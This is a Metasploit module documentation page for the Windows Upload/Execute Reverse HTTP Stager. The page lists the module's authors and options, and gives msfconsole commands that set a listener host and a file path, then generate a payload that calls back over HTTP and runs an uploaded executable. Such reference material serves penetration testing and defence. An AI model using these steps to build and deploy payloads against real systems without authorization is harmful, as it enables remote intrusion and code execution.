Windows Upload/Execute, Reverse HTTP Stager | Metasploit Exploit Database (DB)

Windows Upload/Execute, Reverse HTTP Stager

Tunnel communication over HTTP, Uploads an executable and runs it (staged)

Search Other Modules


Rank

  • Normal

Authors

  • vlad902 < vlad902 [at] gmail.com >
  • sf < stephen_fewer [at] harmonysecurity.com >
  • hdm < hdm [at] metasploit.com >

Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/windows/upexec/reverse_http
msf payload(reverse_http) > set LHOST [MY IP ADDRESS]
msf payload(reverse_http) > set PEXEC [PATH]
msf payload(reverse_http) > generate


Module Options

EXITFUNC Exit technique: none, thread, process, seh (default: process)
LHOST The local listener hostname
LPORT The local listener port (default: 8443)
PEXEC Full path to the file to upload and execute
AutoRunScript A script to run automatically on session creation.
InitialAutoRunScript An initial script to run on session creation (before AutoRunScript)
ReverseListenerComm The specific communication channel to use for this listener
SessionCommunicationTimeout The number of seconds of no activity before this session should be killed
SessionExpirationTimeout The number of seconds before this session should be forcible shut down
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module